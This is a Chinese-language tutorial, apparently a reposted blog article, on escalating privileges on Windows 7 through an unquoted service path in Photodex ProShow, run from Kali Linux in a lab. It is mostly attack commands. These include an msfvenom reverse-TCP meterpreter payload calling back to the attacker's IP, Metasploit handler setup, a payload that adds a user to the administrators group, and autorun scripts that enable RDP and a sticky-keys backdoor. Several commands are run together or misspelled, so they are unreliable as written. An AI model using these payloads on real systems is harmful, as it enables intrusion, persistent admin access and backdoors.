Windows平臺下如何實現(xiàn)提權(quán)

這篇文章給大家分享的是有關(guān)Windows平臺下如何實現(xiàn)提權(quán)的內(nèi)容。小編覺得挺實用的，因此分享給大家做個參考，一起跟隨小編過來看看吧。

無引號服務(wù)路徑漏洞

這個漏洞跟可執(zhí)行文件的路徑有關(guān)，如果文件名中存在空格，或者文件路徑?jīng)]有包裹在雙引號之中，那攻擊者就可以用惡意exe文件替換掉原本合法的exe文件，并實現(xiàn)提權(quán)。

環(huán)境搭建

目標主機：Windows 7

攻擊主機：Kali Linux

首先，我們需要在目標Windows系統(tǒng)中下載并安裝一個名叫photodex proshow的包含漏洞的應(yīng)用程序，下載鏡像可以在Exploit DB上找到。

生成目標主機

為了拿到meterpreter會話，我們至少要成功入侵目標Windows設(shè)備一次，你可以從下圖中看到，我們已經(jīng)拿到了目標主機的meterpreter會話了。現(xiàn)在，打開命令Shell：

shell

你可以看到，我們拿到的shell訪問權(quán)是本地用戶local_user，為了拿到cmd的管理員權(quán)限，我們就需要提權(quán)。首先，我們可以枚舉出目標主機上正在運行的所有服務(wù)，并找出那些沒有被雙引號包裹的服務(wù)路徑，這一步可以用下列命令實現(xiàn)：

wmic service get name,displayname,pathname,startmode |findstr /i "auto"|findstr /i /v "c:\windows\\" |findstr /i /v """

這里，我們枚舉出了下列路徑：

C:\ProgramFiles\Photodex\ProShow Producer\Scsiaccess.exe

這個路徑?jīng)]有被雙引號包裹，而且文件名中也存在空格。

現(xiàn)在，我們需要使用下列命令識別文件目錄權(quán)限：

icacls Scsiaccess.exe

你可以看到，它給任何人都提供了寫入權(quán)限，這也就意味著任何用戶都可以重寫該文件：

通過進程遷移實現(xiàn)提權(quán)

現(xiàn)在，我們只需要把惡意exe放在同一文件夾內(nèi)，它就自動擁有管理員權(quán)限了，當服務(wù)重啟之后，Windows將啟動這個惡意exe。

在Kali Linux中打開終端，然后通過下列命令使用msfvenom生成惡意exe Payload：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234prependmigrate=true prepenmigrateprocess=explorer.exe -f exe >/root/Desktop/scsiaccess.exe

上面的命令將在桌面生成一個惡意exe文件，然后將該文件發(fā)送給目標主機。Payload會嘗試遷移惡意進程，如果用戶通過進程ID終止了當前進程的運行，攻擊者也不會丟失會話和Payload的控制權(quán)。

現(xiàn)在，用惡意exe替換掉合法的可執(zhí)行文件，這里我把合法Scsiaccess.exe重命名為了Scsiaccess.exe.orginal，并將惡意Scsiaccess.exe上傳到了同一文件夾內(nèi)，然后重啟目標主機：

movescsiaccess.exe scsiaccess.exe.orginalupload/root/Desktop/ scsiaccess.exe

reboot：

與此同時，我在新的終端里開啟了多個handler監(jiān)聽器來捕捉meterpreter會話：

use exploit/multi/handlermsf exploit(multi/handler) set payload windows /meterpreter/reverse_tcpmsf exploit(multi/handler) set lhost 192.168.1.107msf exploit(multi/handler) set lport 1234msf exploit(multi/handler) exploit

一段時間之后，我們就能夠拿到擁有管理員權(quán)限的shell了：

通過添加管理員組用戶來實現(xiàn)提權(quán)

使用local_user權(quán)限生成了shell之后，我們就可以在沒有管理員權(quán)限的情況下枚舉完整的用戶名列表了。這里我們發(fā)現(xiàn)，用戶raaz不是管理員組的成員：

net usernet user raaz

同樣的，我們生成了一個exe文件，并用它來將用戶raaz添加到了管理員組中，我們生成的惡意exe文件名還是叫Scsiaccess.exe：

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe >/root/Desktop/scsiaccess.exe

重復上述步驟，用惡意exe文件替換掉同一目錄下的合法exe，然后重啟目標主機：

仔細看下面的截圖，你就會發(fā)現(xiàn)用戶raaz已經(jīng)成為了管理員組成員了：

通過RDP&Sticky_key實現(xiàn)提權(quán)

使用msfvenom生成一個相同文件名（Scsiaccess.exe）的exe文件，然后將其發(fā)送至目標主機，同時利用自動運行腳本開啟多個監(jiān)聽器，這樣將會啟用RDP服務(wù)：

use exploit/multi/handlermsf exploit(multi/handler) set payload windows /meterpreter/reverse_tcpmsf exploit(multi/handler) set lhost 192.168.1.107msf exploit(multi/handler) set lport 1234msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdpmsf exploit(multi/handler) exploit

類似的，當目標服務(wù)重啟之后，我們可以設(shè)置自動運行腳本來啟用sticky_keys：

msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keysmsf exploit(multi/handler) run

你可以從下圖中看到，命令開啟了另一個meterpreter會話（session 3），這個會話擁有管理員權(quán)限，現(xiàn)在我們就可以通過RDP與目標主機建立連接了：

rdp 192.168.1.101

接下來，連續(xù)按下5次shift鍵，你將會拿到擁有管理員權(quán)限的命令行窗口：

感謝各位的閱讀！關(guān)于“Windows平臺下如何實現(xiàn)提權(quán)”這篇文章就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，讓大家可以學到更多知識，如果覺得文章不錯，可以把它分享出去讓更多的人看到吧！